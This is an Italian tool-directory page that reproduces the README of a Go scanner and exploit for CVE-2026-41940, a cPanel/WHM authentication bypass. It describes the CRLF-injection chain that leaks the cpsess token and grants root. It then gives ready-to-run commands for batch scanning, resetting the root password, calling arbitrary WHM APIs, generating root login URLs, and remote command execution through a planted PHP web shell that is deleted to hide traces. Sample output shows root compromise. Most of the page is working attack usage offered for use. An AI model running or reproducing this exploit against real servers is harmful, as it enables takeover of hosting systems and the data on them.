Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cPanelWHM-AuthBypass — Scanner ed exploit tool basato su Go per CVE-2026-41940, un bypass dell'autenticazione in cPanel/WHM. Supporta scansione batch, leak di token e azioni post-exploitation come RCE, cambio password e chiamate API. | Kitploit
Strumenti/GitHubGitHub/kagantua/cpanelwhm-authbypass
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneRed Teaming
GitHubkagantua/cpanelwhm-authbypass

cPanelWHM-AuthBypass

Scanner ed exploit tool basato su Go per CVE-2026-41940, un bypass dell'autenticazione in cPanel/WHM. Supporta scansione batch, leak di token e azioni post-exploitation come RCE, cambio password e chiamate API.

Vedi Repository
1073 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Strumento di Scansione ed Exploit per il Bypass dell'Autenticazione cPanel/WHM

Strumento CLI in Go, riscritto dal PoC Python di watchTowr, per rilevare e sfruttare la vulnerabilità di bypass dell'autenticazione CVE-2026-41940 in cPanel/WHM.

Panoramica della Vulnerabilità

CVE-2026-41940 è una vulnerabilità di bypass dell'autenticazione in cPanel/WHM. La catena di attacco sfrutta l'iniezione CRLF nell'header Basic Auth per divulgare il token di sicurezza e ottenere i privilegi root di WHM.

Catena di attacco in 4 fasi:

  1. Pre-autenticazione — Invia credenziali errate a /login/ per ottenere il cookie whostmgrsession originale
  2. Iniezione CRLF — Inietta caratteri di nuova riga tramite l'header Authorization: Basic, inducendo il server a divulgare il token di sicurezza cpsess nell'header Location del reindirizzamento 307
  • Propagazione del token — Attiva do_token_denied per propagare i dati di autenticazione iniettati dallo storage originale alla cache
  • Verifica dei privilegi — Utilizza il token divulgato per accedere a /json-api/version e verificare l'ottenimento dei privilegi root
  • Caratteristiche

    • Scansione batch — Rileva più target da file, con esecuzione concorrente
    • Rilevamento su singolo target — Verifica rapida specificando un singolo URL
    • Gestione intelligente degli URL — Compatibilità automatica con http://, https://, formati senza protocollo, deduplicazione automatica
    • Sfruttamento della vulnerabilità
      • Modifica della password di root (-passwd)
      • Invocazione di API WHM arbitrarie (-api)
      • Generazione di URL di accesso con un clic (-session)
      • Esecuzione remota di comandi / RCE (-cmd)
    • Evidenziazione nel terminale — [VULN] in rosso, [SAFE] in verde
    • Salvataggio dei risultati — Gli URL vulnerabili vengono salvati automaticamente su file

    Compilazione

    root@kitploit:~
    # Richiede Go 1.20+
    cd cpanel-checker
    go build -o cpanel-checker .
    

    Utilizzo

    Panoramica dei parametri

    ParametroDescrizioneEsempio
    -uURL del singolo target-u https://1.2.3.4:2087
    -fFile contenente l'elenco degli URL-f targets.txt
    -oPercorso del file di output (predefinito result.txt)-o vuln.txt
    -cNumero di concorrenze (predefinito 10)-c 20
    -hostnameSpecifica manuale dell'header Host (predefinito: rilevamento automatico)-hostname cpanel.example.com
    -passwdModifica la password di root (solo modalità -u)-passwd NewP@ss123
    -apiInvoca una funzione API WHM (solo modalità -u)-api listaccts
    -api-paramsParametri API WHM, separati da virgole-api-params user=root,password=123
    -sessionGenera un URL di accesso root con un clic (solo modalità -u)-session
    -keepMantiene l'account temporaneo RCE senza eliminarlo (da usare con -cmd)-keep
    -cmdEsegue un comando remoto / RCE (solo modalità -u)-cmd "id"

    1. Rilevamento su singolo target

    root@kitploit:~
    ./cpanel-checker -u https://target:2087
    

    La porta predefinita è 2087; le seguenti sintassi sono equivalenti:

    root@kitploit:~
    ./cpanel-checker -u https://target
    ./cpanel-checker -u target
    

    2. Scansione batch

    root@kitploit:~
    ./cpanel-checker -f targets.txt -c 20
    

    targets.txt supporta i seguenti formati (un target per riga, le righe che iniziano con # sono commenti):

    root@kitploit:~
    https://1.1.1.1:2087
    http://2.2.2.2:2087
    3.3.3.3:2087
    4.4.4.4
    # questo è un commento
    
    • Deduplicazione automatica: http://1.1.1.1 e https://1.1.1.1 sono considerati lo stesso target e vengono scansionati una sola volta
    • Gli indirizzi senza protocollo vengono automaticamente completati con https://
    • Gli indirizzi senza porta utilizzano automaticamente la porta 2087
    • I risultati vengono salvati in result.txt (personalizzabile con -o)

    3. Modifica della password di root

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"
    

    4. Invocazione di API WHM arbitrarie

    root@kitploit:~
    # Elenca tutti gli account
    ./cpanel-checker -u https://target:2087 -api listaccts
    
    # Invocazione con parametri
    ./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"
    

    5. Generazione di un URL di accesso con un clic

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -session
    

    Viene generato un URL che, aperto nel browser, consente l'accesso al pannello di amministrazione WHM. Nel pannello, utilizzando la funzione Terminal, è possibile ottenere una shell root interattiva.

    Nota: -session è semi-automatico — dopo la generazione dell'URL di accesso, è necessario aprirlo manualmente nel browser.

    6. Esecuzione remota di comandi (RCE)

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id"
    

    Aggiungendo -keep è possibile mantenere l'account temporaneo per accedere al backend cPanel:

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id" -keep
    

    Con -keep, l'output includerà nome utente, password e indirizzo di accesso cPanel dell'account temporaneo (https://host:2083); è possibile utilizzare direttamente queste credenziali per accedere al pannello cPanel.

    -cmd è completamente automatico e non richiede altre operazioni manuali. Flusso interno:

    1. Sfrutta il bypass dell'autenticazione per ottenere i privilegi root
    2. Crea un account cPanel temporaneo tramite API WHM
    3. Scrive una shell PHP in ~/public_html/ tramite UAPI (Fileman::save_file_content)
    4. Accede a https://host/~tmpuser/shell.php via HTTP per eseguire i comandi
    5. Restituisce l'output del comando
    6. Elimina automaticamente l'account temporaneo (pulizia delle tracce)

    Prerequisito: le porte 80 o 443 del target devono essere raggiungibili e Apache/httpd deve essere in esecuzione.

    7. Utilizzo combinato

    È possibile utilizzare più parametri di exploit contemporaneamente:

    root@kitploit:~
    # Ottieni URL di accesso, esegui comandi e modifica la password contemporaneamente
    ./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"
    

    8. Specifica manuale dell'header Host

    Quando l'IP del target non corrisponde al nome host configurato in cPanel, è possibile specificarlo manualmente:

    root@kitploit:~
    ./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com
    

    Per impostazione predefinita, lo strumento rileva automaticamente il nome host corretto tramite il reindirizzamento 307 di /openid_connect/cpanelid.

    Esempio di output

    Scansione batch

    root@kitploit:~
    [1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
    [2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    [3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
    [4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
    [5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    
    ========== Scansione completata ==========
    Totale: 5 | Vulnerabili: 2
    
      ● https://1.1.1.1:2087
      ● https://4.4.4.4:2087
    
    [+] Risultati salvati in result.txt
    

    Esecuzione RCE

    root@kitploit:~
    [*] Target: https://target:2087
    [*] Modalità: Exploit
    
    [0] hostname = cpanel.example.com
    [1] minting a preauth session...
        session base = abc123def456
    [2] sending the CRLF injection (Basic auth + no-ob cookie)...
        leaked token = /cpsess1234567890
    [3] firing do_token_denied to propagate raw -> cache...
        gadget fired
    [4] verifying we're WHM root...
    [+] Privilegi root WHM ottenuti
    
    [*] Esecuzione comando remoto (RCE)...
        [a] Creazione account temporaneo: tmpabcde
        [b] Scrittura shell: /home/tmpabcde/public_html/random.php
        [c] Esecuzione comando: id
        [d] Pulizia account temporaneo: tmpabcde
    [+] Output del comando:
    uid=0(root) gid=0(root) groups=0(root)
    
    [+] Completato. https://target:2087 è stato compromesso
    

    Note

    • I parametri di exploit (-passwd, -api, -session, -cmd) sono disponibili solo in modalità singolo target -u, non in modalità batch -f
    • Lo strumento salta la verifica dei certificati TLS per impostazione predefinita
    • Il timeout delle richieste è di 15 secondi
    • Le righe che iniziano con # nel file degli URL vengono ignorate

    Disclaimer

    Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi di ricerca. Testare sistemi senza autorizzazione è illegale. L'utente deve assicurarsi di aver ottenuto l'esplicita autorizzazione scritta del proprietario del sistema target. L'autore non si assume alcuna responsabilità per un uso improprio.

    Ringraziamenti

    • PoC originale: watchTowr / Sina Kheirkhah (@SinSinology)
    • CVE: CVE-2026-41940
    Scarica lo strumento